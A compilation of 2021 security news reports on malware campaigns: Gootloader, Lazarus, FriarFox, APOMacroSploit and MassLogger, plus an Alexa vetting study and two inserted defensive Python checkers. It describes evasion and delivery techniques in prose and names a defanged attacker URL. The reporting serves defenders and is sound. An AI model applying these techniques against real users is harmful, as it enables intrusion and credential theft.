Over the years, the cybercrime tool has evolved to gain new information-stealing features, with the Gootkit loader repurposed in combination with REvil/Sodinokibi ransomware infections reported last year.

While campaigns using social engineering tricks to deliver malicious payloads are a dime a dozen, Gootloader takes it to the next level.

The infection chain resorts to sophisticated techniques that involve hosting malicious ZIP archive files on websites belonging to legitimate businesses that have been gamed to appear among the top results of a search query using manipulated search engine optimization (SEO) methods.

What's more, the search engine results point to websites that have no "logical" connection to the search query, implying that the attackers must be in possession of a vast network of hacked websites. In one case spotted by the researchers, a search for advice on a real estate agreement surfaced a breached neonatal medical practice based in Canada as the first result.

"To ensure targets from the right geographies are captured, the adversaries rewrite website code 'on the go' so that website visitors who fall outside the desired countries are shown benign web content, while those from the right location are shown a page featuring a fake discussion forum on the topic they've queried," the researchers said.

Clicking the search result takes the user to a fake message board-like page that not only matches the search terms used in the initial query but also includes a link to the ZIP file, which contains a heavily obfuscated Javascript file that initiates the next stage of compromise to inject the fileless malware fetched from a remote server into memory.

This takes the form of a multi-stage evasive approach that begins with a .NET loader, which contains a Delphi-based loader, which in turn contains the final payload in encrypted form.

In addition to delivering the REvil ransomware and the Gootkit trojan, multiple campaigns have been spotted currently leveraging the Gootloader framework to deliver the Kronos financial malware in Germany stealthily, and the Cobalt Strike post-exploitation tool in the U.S.

It's still unclear how the operators gain access to the websites to serve the malicious injects, but the researchers suspect the attackers may have obtained the passwords by installing the Gootkit malware or purchasing stolen credentials from underground markets, or by leveraging security flaws present in the plugins used alongside content management system (CMS) software.

"The developers behind Gootkit appear to have shifted resources and energy from delivering just their own financial malware to creating a stealthy, complex delivery platform for all kinds of payloads, including REvil ransomware," said Gabor Szappanos, threat research director at Sophos.

"This shows that criminals tend to reuse their proven solutions instead of developing new delivery mechanisms. Further, instead of actively attacking endpoint tools as some malware distributors do, the creators of Gootloader have opted for convoluted evasive techniques that conceal the end result," he added.


Malware Gangs Partner Up in Double-Punch Security Threat
27.2.2021 
Virus  Threatpost

From TrickBot to Ryuk, more malware cybercriminal groups are putting their heads together when attacking businesses.

Cybergangs are joining forces under the guise of affiliate groups and “as-a-service” models, warns Maya Horowitz, the director of threat intelligence research with Check Point Research. She said the trend is driving a new and thriving cybercriminal underground economy.

Several malware gangs have paired up over the past year – such as the FIN6 cybercrime group and the operators of the TrickBot malware. The purpose is to help each other fill criminal skill gaps and ultimately pose a more potent threat to victims.

“In some cases, it’s just an as-a-service model, so the groups don’t necessarily have to know each other,” Horowitz said. “But in many cases, the cooperation is so tight, that we have to assume that there’s something there behind the scenes, that these groups actually communicate and complete each other’s gaps in the attack chain.”

Horowitz talks about these partnerships and what they mean for victims, during this week’s ThreatpostNOW video interview.


Below is a lightly edited transcript of the interview.

Lindsey Welch: Welcome to ThreatpostNOW, Threatpost’s video segment, where we do deep-dive interviews with cybersecurity experts about the top security threats, challenges and trends facing businesses today. I’m joined today by Maya Horowitz, the director of threat intelligence research with Check Point Research. Maya is responsible for leading the intelligence and research efforts while leveraging her team’s analysis into threat prevention products. Since Maya joined Check Point, almost seven years ago, she has successfully discovered and exposed many, many new cyber threat campaigns. So Maya, thank you so much for joining me today.

Maya Horowitz: Great to be here.

LW: This week, CPX 360 kicks off. And I wanted to get your thoughts on some of the biggest threats that we should be on the lookout for in the year ahead. I know, we talked, I think it was a year ago actually, in New Orleans about what you were seeing then. And certainly a lot has changed both in the cybersecurity landscape, but also globally with the COVID-19 pandemic, and everything else. So Maya, in terms of what you’re seeing, what are some of the most active cybercriminal threat groups or APT groups that we should be on the lookout for this year?

Top Malware Families to Watch Out For
MH: So actually, the leading malware or the leading threat group for 2020 was Emotet. And just a couple of weeks ago, it was taken down. We don’t know to what extent yet but, at least for now, this malware is not a threat.

But I guess the question is, who will take the top place in our most wanted malware? And from our statistics, it looks like the answer would probably be one of the following: Either Phorpiex, maybe Dridex, maybe QBot, all very, very broadly used malware botnets. But the question is not only which of them would be most popular, but it’s also about partnerships. So with Emotet, it wasn’t only about the botnet, it was actually the next-stage payloads that were very severe, because they had partnerships with some of the top ransomware families.

And so I think the question is both about the distribution of the botnet, but also what the next-stage malware will be, and which of them will be able to distribute some of the top ransomware, like, Ryuk and others. So I guess we’ll have to wait and see which of them takes the lead.

Ransomware Gangs Make Key Partnerships
LW: Right. And that’s a really good point too about the partnership aspect of it. I know, for instance, we’ve seen TrickBot being used to deploy further ransomware and other types of malware as well. And we’ve seen a lot of really interesting partnerships between different malware variants. And, as you mentioned, Emotet, the recent takedown of Emotet has had a very interesting shaping of the malware landscape now, and also we’ve seen a couple of other similar takedown efforts and arrest efforts, including with Egregor and other ones. So can you talk a little bit more about these partnerships and how they continue to really shape the cybersecurity malware landscape?

MH: Yeah, I guess many threat groups learned that they can’t be, say full stack, with the entire tech chain. So each group or each individual has their own added value, so it could be the distribution, right? So it could be you know, I’m the best at sending many emails, right I have the mailing lists and I can send many emails, someone else would have the technique on how to make people click the link or open the malicious document. And another would have the technique on how to actually then install the malware. From there, lateral movement is something else, getting the initial intelligence about the network is something else. And eventually, the part that does the damage is another thing. And we know that in many attack chains, we do have separate people or groups for each of these parts. So with Emotet, this was both the emails and the initial payload or the botnet, but then it would sometimes move on to TrickBot to do the lateral movement, and then say to Ryuk as the ransomware. So in some cases, it’s just as-a-service model, so the groups don’t necessarily have to know each other. But in many cases, the cooperation is so tight, that we have to assume that there’s something there behind the scenes that these groups actually communicate and complete each other’s gaps in the attack chain.

Malware: As-a-Service Models Versus Partnerships
LW: Right, I was gonna ask, when you have those types of attack chain operations, where multiple strains of malware are being used, what are you seeing there in terms of, is it usually one group who is using an as-a-service model, as you mentioned before? What’s the benefits of groups who are working together? How might they kind of split up the ensuing profit? And how does that work really on the back end?

MH: So I can’t really comment on the back end, and how they would split the revenue. And it also varies. In some cases, they would just split, in other cases, they would just pay for the service, doesn’t matter if they actually got the money from the victim eventually or not. And I guess that’s also part of whether it’s as-a-service or an actual collaboration and joint venture. But by the way, in some cases, we even see it with some APT groups that for parts of the attack chain, they would use malware-as-a-service. And it could be just to save on the time and resources in order to create this part of the attack, but also could be for the smokescreen, or so that researchers won’t be able to understand who the attackers are because they’re using generic tools. So we are seeing all these types of collaborations between different groups, but it’s not only cyber criminals, it’s also APTs.

LW: Right, and regardless, this is not a good thing for the victims, I mean, this is innovation happening across the sphere there on the cybercriminal side of things. So not great for different businesses who are dealing with these attacks, for sure.

MH: Yes, but there is also a bright side, because especially mentioning APTs, if they use the same tools used by cyber criminals, maybe these are sometimes tools that are also easier to detect and to block.

COVID-19 Pandemic: Cybercriminals Shift Lures to Remote Work
LW: Yeah, that’s a really good point, for sure. Now I did want to mention, the ongoing pandemic, we’ve been living with COVID-19 for a while now, and cybercriminals have certainly kept up with that, unfortunately; they’ve been updating their TTPs and lures to really tap into the different themes that we’ve seen with the pandemic, as well as really the emotions just on the side of victims. So how have you seen the cybercriminal space evolve over the past year to leverage the pandemic, as well as kind of this shift that we’ve had to remote work?


MH: So I think it’s mostly about, as you just said, about remote work and remote users, and how to target them or to benefit from the fact that they are that they are not necessarily behind their organization’s security or that there are more ways to connect remotely to a network. So it applies both to the employees but also sometimes to the threat actors. And of course, the fact that everything was happening so fast, necessarily means that at least in some organizations, there were holes in the security.

Remote Desktop Protocol as an Initial Attack Vector
So what we’ve been seeing is more and more vulnerabilities and exploits for different VPN clients. That’s one important thing. But also more and more attacks on RDP, remote desktop protocol. And going back to ransomware, actually, in 2020, most of the ransomware attacks did not even start with emails they started with exploitation of RDP vulnerabilities. So it means the threat actors are indeed, understanding that there’s a new attack, it’s not really a new attack vector, but one that is more robust now and more vulnerable than in the past.

LW: Yeah, and that’s, that’s interesting, because I feel like RDP, that is something that is an attack vector that we’ve seen for a while now. So you know, given that, what are your top security practice recommendations for companies who are continuing to deal with the struggles of remote work, whether it is securing RDP or VPNs, or some of the other attack initial vectors you had mentioned there?

Best Cybersecurity Protection Practices for Enterprises
MH: Well, threat actors exploit vulnerabilities in both technology and in people. So I split my answer into one for the technology part, which is making sure of course to do security patches. And for the human being part, or the human error part, it is doing awareness; security awareness for employees is super important, and in many cases neglected. But of course, doing patches and security awareness, we can’t really cover all the attack vectors this way. It’s just impossible. And there are people who are dedicated to security researchers, security companies like Check Point and others. And we make sure to also understand this threat landscape and to cover it in our products. So it’s also very important to also apply appropriate security solutions.

LW: Great, those are definitely important pieces of advice. So Maya, thank you so much for coming on to ThreatpostNOW to talk about some of the biggest cybercrime trends you’re seeing.

MH: Thank you Lindsey.

LW: Great. And to all of our viewers, thank you again for tuning in to ThreatpostNOW. This is Lindsey Welch once again with Maya Horowitz with Check Point, and be sure to catch us on our next episode. Thank you.


North Korean Hackers Targeting Defense Firms with ThreatNeedle Malware
27.2.2021 
Virus  Thehackernews
A prolific North Korean state-sponsored hacking group has been tied to a new ongoing espionage campaign aimed at exfiltrating sensitive information from organizations in the defense industry.

Attributing the attacks with high confidence to the Lazarus Group, the new findings from Kaspersky signal an expansion of the APT actor's tactics by going beyond the usual gamut of financially-motivated crimes to fund the cash-strapped regime.

This broadening of its strategic interests happened in early 2020 by leveraging a tool called ThreatNeedle, researchers Vyacheslav Kopeytsev and Seongsu Park said in a Thursday write-up.

At a high level, the campaign leverages a multi-step approach that begins with a carefully crafted spear-phishing attack leading eventually to the attackers gaining remote control over the devices.

ThreatNeedle is delivered to targets via COVID-themed emails with malicious Microsoft Word attachments as initial infection vectors that, when opened, run a macro containing malicious code designed to download and execute additional payloads on the infected system.

The next-stage malware functions by embedding its malicious capabilities inside a Windows backdoor that offers features for initial reconnaissance and deploying malware for lateral movement and data exfiltration.

"Once installed, ThreatNeedle is able to obtain full control of the victim's device, meaning it can do everything from manipulating files to executing received commands," Kaspersky security researchers said.

Kaspersky found overlaps between ThreatNeedle and another malware family called Manuscrypt that has been used by Lazarus Group in previous hacking campaigns against the cryptocurrency and mobile games industries, besides uncovering connections with other Lazarus clusters such as AppleJeus, DeathNote, and Bookcode.

Interestingly, Manuscrypt was also deployed in a Lazarus Group operation last month, which involved targeting the cybersecurity community with opportunities to collaborate on vulnerability research, only to infect victims with malware that could cause the theft of exploits developed by the researchers for possibly undisclosed vulnerabilities, thereby using them to stage further attacks on vulnerable targets of their choice.

Perhaps the most concerning development is a technique the attackers adopted to bypass network segmentation protections in an unnamed enterprise network by "gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the intranet network to their remote server."

The cybersecurity firm said organizations in more than a dozen countries have been affected to date.

At least one of the spear-phishing emails referenced in the report is written in Russian, while another message came with a malicious file attachment named "Boeing_AERO_GS.docx," possibly implying a U.S. target.

Earlier this month, three North Korean hackers associated with the military intelligence division of North Korea were indicted by the U.S. Justice Department for allegedly taking part in a criminal conspiracy that attempted to extort $1.3 billion in cryptocurrency and cash from banks and other organizations around the world.

"In recent years, the Lazarus group has focused on attacking financial institutions around the world," the researchers concluded. "However, beginning in early 2020, they focused on aggressively attacking the defense industry."

"While Lazarus has also previously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency businesses, it is currently being actively used in cyberespionage attacks."


ALERT: Malicious Amazon Alexa Skills Can Easily Bypass Vetting Process
27.2.2021 
Virus  Thehackernews

Researchers have uncovered gaps in Amazon's skill vetting process for the Alexa voice assistant ecosystem that could allow a malicious actor to publish a deceptive skill under any arbitrary developer name and even make backend code changes after approval to trick users into giving up sensitive information.

The findings were presented on Wednesday at the Network and Distributed System Security Symposium (NDSS) conference by a group of academics from Ruhr-Universität Bochum and the North Carolina State University, who analyzed 90,194 skills available in seven countries, including the US, the UK, Australia, Canada, Germany, Japan, and France.

Amazon Alexa allows third-party developers to create additional functionality for devices such as Echo smart speakers by configuring "skills" that run on top of the voice assistant, thereby making it easy for users to initiate a conversation with the skill and complete a specific task.

Chief among the findings is the concern that a user can activate a wrong skill, which can have severe consequences if the skill that's triggered is designed with insidious intent.

The pitfall stems from the fact that multiple skills can have the same invocation phrase.

Indeed, the practice is so prevalent that the investigation spotted 9,948 skills that share the same invocation name with at least one other skill in the US store alone. Across all the seven skill stores, only 36,055 skills had a unique invocation name.

Given that the actual criteria Amazon uses to auto-enable a specific skill among several skills with the same invocation names remain unknown, the researchers cautioned it's possible to activate the wrong skill and that an adversary can get away with publishing skills using well-known company names.

"This primarily happens because Amazon currently does not employ any automated approach to detect infringements for the use of third-party trademarks, and depends on manual vetting to catch such malevolent attempts which are prone to human error," the researchers explained. "As a result users might become exposed to phishing attacks launched by an attacker."
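The automated check the researchers say is missing can be sketched in a few dozen lines. The following is an added example, not code from the NDSS paper or from Amazon: it normalizes invocation phrases the way a voice front end would treat them (case, punctuation and spacing do not matter when spoken), groups skills that would collide on the same phrase, and flags skills whose invocation name is a protected phrase but whose developer is not on the allow list for it. The skill catalogue, developer names and trademark registry are all constructed sample data.

```python
import re
from collections import defaultdict

# Constructed sample catalogue; skill names, phrases and developers are invented.
SAMPLE_SKILLS = [
    {"name": "Ride Sharing Assistant", "invocation": "Ride Share", "developer": "Ride Share Inc."},
    {"name": "Ride Share Helper", "invocation": "ride share", "developer": "Anon Dev 42"},
    {"name": "Bank Balance Check", "invocation": "My Bank", "developer": "My Bank Corp"},
    {"name": "Fast Balance", "invocation": "my bank", "developer": "Random Publisher"},
    {"name": "Weather Now", "invocation": "weather now", "developer": "Weather Now LLC"},
]

# Constructed trademark registry: protected phrase -> developers allowed to use it.
TRADEMARKS = {
    "ride share": {"Ride Share Inc."},
    "my bank": {"My Bank Corp"},
}


def normalize(phrase):
    """Collapse case, punctuation and whitespace so that spoken-equivalent phrases compare equal."""
    return " ".join(re.sub(r"[^a-z0-9 ]", " ", phrase.lower()).split())


def find_collisions(skills):
    """Return {normalized invocation phrase: [skill names]} for phrases shared by 2+ skills."""
    groups = defaultdict(list)
    for skill in skills:
        groups[normalize(skill["invocation"])].append(skill["name"])
    return {phrase: names for phrase, names in groups.items() if len(names) > 1}


def find_trademark_misuse(skills, trademarks):
    """Return (skill name, phrase, developer) for skills using a protected phrase
    whose developer is not on that phrase's allow list."""
    hits = []
    for skill in skills:
        phrase = normalize(skill["invocation"])
        allowed = trademarks.get(phrase)
        if allowed is None:
            continue
        allowed_norm = {normalize(d) for d in allowed}
        if normalize(skill["developer"]) not in allowed_norm:
            hits.append((skill["name"], phrase, skill["developer"]))
    return hits


if __name__ == "__main__":
    for phrase, names in find_collisions(SAMPLE_SKILLS).items():
        print(f"collision on '{phrase}': {names}")
    for name, phrase, dev in find_trademark_misuse(SAMPLE_SKILLS, TRADEMARKS):
        print(f"possible trademark misuse: '{name}' uses '{phrase}' but is published by {dev}")
```

The collision list is what a reviewer would need to decide which skill Amazon should auto-enable for an ambiguous phrase; the misuse list is the automated trademark check the quoted passage says is currently left to manual vetting.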

Even worse, an attacker can make code changes following a skill's approval to coax a user into revealing sensitive information like phone numbers and addresses by triggering a dormant intent.

In a way, this is analogous to a technique called versioning that's used to bypass verification defences. Versioning refers to submitting a benign version of an app to the Android or iOS app store to build trust among users, only to replace the codebase over time with additional malicious functionality through updates at a later date.

To test this out, the researchers built a trip planner skill that allows a user to create a trip itinerary that was subsequently tweaked after initial vetting to "inquire the user for his/her phone number so that the skill could directly text (SMS) the trip itinerary," thus deceiving the individual into revealing his (or her) personal information.

Furthermore, the study found that the permission model Amazon uses to protect sensitive Alexa data can be circumvented. This means that an attacker can directly request data (e.g., phone numbers, Amazon Pay details, etc.) from the user that is supposed to be cordoned off behind permission APIs.

The idea is that while skills requesting sensitive data must invoke the permission APIs, nothing stops a rogue developer from simply asking the user for that information directly.

The researchers said they identified 358 such skills capable of requesting information that should be ideally secured by the API.

Lastly, in an analysis of privacy policies across different categories, it was found that only 24.2% of all skills provide a privacy policy link, and that around 23.3% of such skills do not fully disclose the data types associated with the permissions requested.

Noting that Amazon does not mandate a privacy policy for skills targeting children under the age of 13, the study raised concerns about the lack of widely available privacy policies in the "kids" and "health and fitness" categories.

"As privacy advocates we feel both 'kid' and 'health' related skills should be held to higher standards with respect to data privacy," the researchers said, while urging Amazon to validate developers and perform recurring backend checks to mitigate such risks.

"While such applications ease users' interaction with smart devices and bolster a number of additional services, they also raise security and privacy concerns due to the personal setting they operate in," they added.


Malicious Mozilla Firefox Extension Allows Gmail Takeover
26.2.2021
Virus  Threatpost

The malicious extension, FriarFox, snoops in on both Firefox and Gmail-related data.

A newly uncovered cyberattack is taking control of victims’ Gmail accounts, by using a customized, malicious Mozilla Firefox browser extension called FriarFox.

Researchers say the threat campaign, observed in January and February, targeted Tibetan organizations and was tied to TA413, a known advanced persistent threat (APT) group that researchers believe to be aligned with the Chinese state.

The group behind this attack aims to gather information on victims by snooping in on their Firefox browser data and Gmail messages, said researchers.

After installation, FriarFox gives cybercriminals various types of access to users’ Gmail accounts and Firefox browser data.

For instance, cybercriminals have the ability to search, read, label, delete, forward and archive emails, receive Gmail notifications and send mail from the compromised account. And, given their Firefox browser access, they could access user data for all websites, display notifications, read and modify privacy settings, and access browser tabs.

“The introduction of the FriarFox browser extension in TA413’s arsenal further diversifies a varied, albeit technically limited repertoire of tooling,” said Proofpoint on Thursday. “The use of browser extensions to target the private Gmail accounts of users, combined with the delivery of Scanbox malware, demonstrates the malleability of TA413 when targeting dissident communities.”

The Cyberattack: Stemming From Malicious Emails
The attack stemmed from phishing emails (first detected in late January), targeting several Tibetan organizations. One of the emails uncovered by researchers purported to be from the “Tibetan Women’s Association,” which is a legitimate group based in India. The subject of the email was: “Inside Tibet and from the Tibetan exile community.”

Researchers noted that the emails were delivered from a known TA413 Gmail account, which has been in use for several years. The email impersonates the Bureau of His Holiness the Dalai Lama in India, said researchers.

The email contained a malicious URL, which impersonated a YouTube page (hxxps://you-tube[.]tv/). In reality, this link took recipients to a fake Adobe Flash Player update-themed landing page, where the process of downloading the malicious browser extension begins.

Fake Adobe Flash Player Page and FriarFox Download
The malicious “update” page then executes several JavaScript files, which profile the user’s system and determine whether or not to deliver the malicious FriarFox extension; the installation of FriarFox depends on several conditions.

“Threat actors appear to be targeting users that are utilizing a Firefox Browser and are utilizing Gmail in that browser,” the researchers said. “The user must access the URL from a Firefox browser to receive the browser extension. Additionally, it appeared that the user must be actively logged in to a Gmail account with that browser to successfully install the malicious XPI [FriarFox] file.”

Firefox users with an active Gmail session are immediately served the FriarFox extension (from hxxps://you-tube[.]tv/download.php) with a prompt that enables the download of software from the site.

[Image] Campaign landing page. Credit: Proofpoint

They are prompted to add the browser extension (by approving the extension’s permissions), which claims to be “Flash update components.”

But the threat actors also utilize various tricks against users who are either not using a Firefox browser and/or who do not have an active Gmail session.

For instance, one user who did not have an active Gmail session and wasn’t using Firefox was redirected to the legitimate YouTube login page, after visiting the fake Adobe Flash Player landing page. The attackers then attempted to access an active domain cookie in use on the site.

In this situation, “actors may be attempting to leverage this domain cookie to access the user’s Gmail account in the instance that a GSuite federated login session is used to log in to the user’s YouTube account,” said researchers. However, “this user is not served the FriarFox browser extension.”

FriarFox Browser Extension: Malicious Capabilities
Researchers said that FriarFox appears to be based on an open-source tool called “Gmail Notifier (restartless).” This is a free tool that’s available from various locations, including GitHub, the Mozilla Firefox Browser Add-Ons store and the QQ App store. The malicious extension also comes in the form of an XPI file, noted researchers – these files are compressed installation archives used by various Mozilla applications, and contain the contents of a Firefox browser extension.

[Image] The FriarFox attack vector. Credit: Proofpoint

“TA413 threat actors altered several sections of the open-source browser extension Gmail Notifier to enhance its malicious functionality, conceal browser alerts to victims and disguise the extension as an Adobe Flash-related tool,” said researchers.
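Because an XPI is a zip archive whose manifest.json declares the permissions the extension will hold, a reviewer can triage one before it is ever installed. The following is an added example, not Proofpoint's tooling and not FriarFox itself: it builds a constructed XPI in memory with the permission set that would grant the capabilities described above (all websites, tabs, notifications, privacy settings), then opens it and reports which permissions deserve scrutiny and whether the name looks like a plugin "updater". The risk labels, the keyword list and the sample manifest are this example's assumptions.

```python
import io
import json
import zipfile

# Permissions mapped to the capabilities the article lists for FriarFox. The mapping and
# the "high risk" label are this example's own assumptions, not a Mozilla classification.
HIGH_RISK_PERMISSIONS = {
    "<all_urls>": "read and change data on every website",
    "tabs": "enumerate and access browser tabs",
    "notifications": "display notifications to the user",
    "privacy": "read and modify privacy settings",
    "cookies": "read and write site cookies",
    "webRequest": "observe or intercept network requests",
}

# Words an extension posing as a plugin updater tends to use in its name (heuristic).
UPDATER_WORDS = ("flash", "update", "player", "plugin")


def build_sample_xpi():
    """Build a constructed XPI in memory. An XPI is a zip archive, so zipfile is enough.
    The manifest mimics the shape of a WebExtension manifest; it is not FriarFox."""
    manifest = {
        "manifest_version": 2,
        "name": "Flash update components",
        "version": "1.0",
        "permissions": ["<all_urls>", "tabs", "notifications", "privacy", "storage"],
        "background": {"scripts": ["background.js"]},
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("manifest.json", json.dumps(manifest))
        archive.writestr("background.js", "// constructed placeholder, no real logic\n")
    return buf.getvalue()


def triage_xpi(xpi_bytes):
    """Open an XPI, read its manifest and flag permissions and naming worth a reviewer's attention."""
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as archive:
        manifest = json.loads(archive.read("manifest.json"))
        members = archive.namelist()
    permissions = manifest.get("permissions", [])
    flagged = {p: HIGH_RISK_PERMISSIONS[p] for p in permissions if p in HIGH_RISK_PERMISSIONS}
    name = manifest.get("name", "")
    impersonation_hint = any(word in name.lower() for word in UPDATER_WORDS)
    return {
        "name": name,
        "flagged_permissions": flagged,
        "impersonation_hint": impersonation_hint,
        "members": members,
    }


if __name__ == "__main__":
    result = triage_xpi(build_sample_xpi())
    print(f"extension: {result['name']}  updater-style name: {result['impersonation_hint']}")
    for perm, why in result["flagged_permissions"].items():
        print(f"  {perm:15} -> {why}")
```

The same triage runs unchanged on a real XPI read from disk; the value of doing it before approval is that the permission prompt the victim clicks through is exactly the list this function prints.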

After FriarFox is installed, one of the JavaScript files (tabletView.js) also contacts an actor-controlled server to retrieve the Scanbox framework. Scanbox is a PHP- and JavaScript-based reconnaissance framework, dating back to 2014, that can collect information about victim systems.

TA413 Threat Group: Continually Evolving
TA413 has been associated with Chinese state interests and is known for targeting the Tibetan community. As recently as September, the China-based APT was sending organizations spear-phishing emails that distribute a never-before-seen intelligence-collecting RAT dubbed Sepulcher.

“While not conventionally sophisticated when compared to other active APT groups, TA413 combines modified open-source tools, dated shared reconnaissance frameworks, a variety of delivery vectors and very targeted social-engineering tactics,” said researchers.

Researchers said this latest campaign shows that TA413 appears to be pivoting to using more modified open-source tooling to compromise victims.

“Unlike many APT groups, the public disclosure of campaigns, tools and infrastructure has not led to significant TA413 operational changes,” they said. “Accordingly, we anticipate continued use of a similar modus operandi targeting members of the Tibetan diaspora in the future.”


Researchers uncovered a new Malware Builder dubbed APOMacroSploit
22.2.2021
Virus  Securityaffairs

Researchers spotted a new Office malware builder, tracked as APOMacroSploit, that was employed in a campaign targeting more than 80 customers worldwide.
Researchers from security firm Check Point uncovered a new Office malware builder called APOMacroSploit, which was employed in attacks that targeted more than 80 customers worldwide.

APOMacroSploit is a macro builder that was used to create weaponized Excel documents used in multiple phishing attacks. The threat actor behind the tool continuously updated it to evade detection. Check Point researchers were able to unmask one of the threat actors behind the builder.
Excel documents created with the APOMacroSploit builder are capable of bypassing antivirus software, Windows Antimalware Scan Interface (AMSI), and even Gmail and other email-based phishing detection.

“The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script.” reads the analysis published by the researchers.

“Based on the number of customers and the lowest option price for this product, we estimate that the two main threat actors made at least $5000 in 1.5 months, just by selling the APOMacroSploit product.”
Experts believe APOMacroSploit was created by two French-based threat actors “Apocaliptique” and “Nitrix” who were selling the product on HackForums.net.

About 40 hackers took part in the campaign the researchers uncovered in November; they used 100 different email senders to target users in more than 30 different countries.

“The initial malicious document our customer received was an XLS file containing an obfuscated XLM macro called Macro 4.0. The macro is triggered automatically when the victim opens the document, and downloads a BAT file from cutt.ly.” continues the analysis. “The execution of the command “attrib” enables the BAT script to hide in the victim’s machine. We assume the reordering of the PowerShell instructions via the Start-Sleep command (visible after deobfuscation) is seen by the attacker as another static evasion.”

The researchers noticed that the attackers made a mistake: the cutt[.]ly domain redirects directly to a download server and does not perform the request on the back end. The servers host the BAT files, and for each file the nickname of the customer was inserted into the filename.

The BAT script downloads the fola.exe malware for one of the following Windows versions:

Windows 10
Windows 8.1
Windows 8
Windows 7
In order to avoid detection, the BAT scripts add the malware location to the Windows Defender exclusion path and disable Windows cleanup before executing the malware.

In at least one attack, the threat actors used a Delphi Crypter along with a second-stage malware, a remote access Trojan dubbed BitRAT.

BitRAT implements multiple features, including cryptocurrency mining and RAT capabilities. Shellcode injected into Notepad.exe drops a VBS file in the startup folder to ensure persistence.

The researchers were able to unmask the real identity of Nitrix, because he revealed his actual name in a post on Twitter containing a picture of a ticket he bought for a concert in December 2014.

Check Point Research shared their findings with law enforcement and provided Indicators of Compromise (IoCs) for this campaign in the report.


Experts warn of threat actors abusing Google Alerts to deliver unwanted programs
22.2.2021
Virus  Securityaffairs

Experts warn of threat actors using Google Alerts to promote a fake Adobe Flash Player updater that delivers unwanted programs.
Experts from BleepingComputer are warning of threat actors that are using Google Alerts to promote a fake Adobe Flash Player updater that delivers unwanted programs. Bad actors publish posts with titles containing popular keywords to allow Google Search to index the content.

Google Alerts is a content change detection and notification service, it sends emails to the user when it finds new results (i.e. web pages, newspaper articles, blogs, or scientific research) that match the user’s search term(s).
Upon indexing the content, Google Alerts will alert people who are searching those specific terms.

Clicking on the links sent by Google Alerts for matches in the fake stories redirects users to malicious sites under the control of the threat actors.

However, experts pointed out that when the URL of a fake story is visited directly, the website states that the page does not exist.

BleepingComputer experts observed multiple campaigns abusing the Google notification service.

“This weekend, BleepingComputer observed the fake news stories redirecting to a new campaign that states your Flash Player is outdated and then prompts you to install an updater.” states BleepingComputer.

[Image] Source: BleepingComputer
Once the ‘Update’ button is clicked, the victim downloads a setup.msi file that installs a potentially unwanted program called ‘One Updater.’

Even if “One Updater” is not malware, we cannot exclude that this technique could be used by threat actors to deliver and execute malicious payloads in future attacks.


New Masslogger Trojan variant exfiltrates user credentials
20.2.2021
Virus  Securityaffairs

The infamous MassLogger Windows credential stealer is back and it has been upgraded to steal credentials from Outlook, Chrome, and instant messenger apps.
MassLogger Windows credential stealer is back and it has been upgraded to steal credentials from Outlook, Chrome, and instant messenger apps.

Cisco Talos experts uncovered attacks against users in Turkey, Latvia, and Italy; the infections have some similarities with attacks that targeted users in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October, and November 2020.

The MassLogger infections were first spotted in the wild in April, and since then the malware's authors have been improving the malicious code.
Unlike other Masslogger trojan samples previously documented, the one employed in the new campaign uses the Microsoft Compiled HTML Help file format, which is a Microsoft proprietary online help format, to start the infection chain. The Microsoft file format can also contain active script components, in this case JavaScript, which is used to launch the malware in the attacks detected by Talos.

“Although operations of the Masslogger trojan have been previously documented, we found the new campaign notable for using the compiled HTML file format to start the infection chain.” reads the analysis published by Cisco Talos. “This file format is typically used for Windows Help files, but it can also contain active script components, in this case JavaScript, which launches the malware’s processes.”

The infection chain starts with an email message containing a legitimate-looking subject line and comes with a RAR attachment with a slightly unusual filename extension.

RAR archives can also be split into multi-volume archives. In the attacks observed by Talos, the attachment carries a multi-volume extension such as “r00” instead of .rar, and the archive contains a file with the .chm extension. This trick was implemented to bypass security programs that check the file extension of the attachment.

Upon opening the attachments, the message “Customer service” is displayed while an obfuscated JavaScript code creates an HTML page, which in turn contains a PowerShell downloader that fetches from a legitimate server the loader used to launch the MassLogger payload.

The malware is able to exfiltrate stolen data via SMTP, FTP or HTTP. The latest version of MassLogger (version 3.0.7563.31381) implements features to steal credentials from Pidgin messenger client, Discord, NordVPN, Outlook, Thunderbird, Firefox, QQ Browser, and Chromium-based browsers such as Chrome, Edge, Opera, and Brave.

The Masslogger Trojan could also act as a keylogger, but the variant analyzed by the experts has disabled this functionality.

The malware is almost entirely executed in memory; for this reason, detecting the threat requires continuous background memory scans. The malware only leaves the attachment and the compiled HTML help file on the disk of the infected machine.

“Users are advised to configure their systems for logging PowerShell events such as module loading and executed script blocks as they will show executed code in its deobfuscated format. Talos will continue to track similar campaigns to make sure adequate protection is included in Cisco Secure products.” concludes the report.


Masslogger Trojan Upgraded to Steal All Your Outlook, Chrome Credentials
20.2.2021
Virus  Thehackernews
A credential stealer infamous for targeting Windows systems has resurfaced in a new phishing campaign that aims to steal credentials from Microsoft Outlook, Google Chrome, and instant messenger apps.

Primarily directed against users in Turkey, Latvia, and Italy starting mid-January, the attacks involve the use of MassLogger — a .NET-based malware with capabilities to hinder static analysis — building on similar campaigns undertaken by the same actor against users in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October, and November 2020.

MassLogger was first spotted in the wild last April, but the presence of a new variant implies malware authors are constantly retooling their arsenal to evade detection and monetize them.
"Although operations of the Masslogger trojan have been previously documented, we found the new campaign notable for using the compiled HTML file format to start the infection chain," researchers with Cisco Talos said on Wednesday.

Compiled HTML (or .CHM) is a proprietary online help format developed by Microsoft that's used to provide topic-based reference information.

The new wave of attacks commences with phishing messages containing "legitimate-looking" subject lines that appear to relate to a business.

One of the emails targeted at Turkish users had the subject "Domestic customer inquiry," with the body of the message referencing an attached quote. In September, October and November, the emails took the form of a "memorandum of understanding," urging the recipient to sign the document.

Regardless of the message theme, the attachments adhere to the same format: a RAR multi-volume filename extension (e.g., "70727_YK90054_Teknik_Cizimler.R09") in a bid to bypass attempts to block RAR attachments using its default filename extension ".RAR."

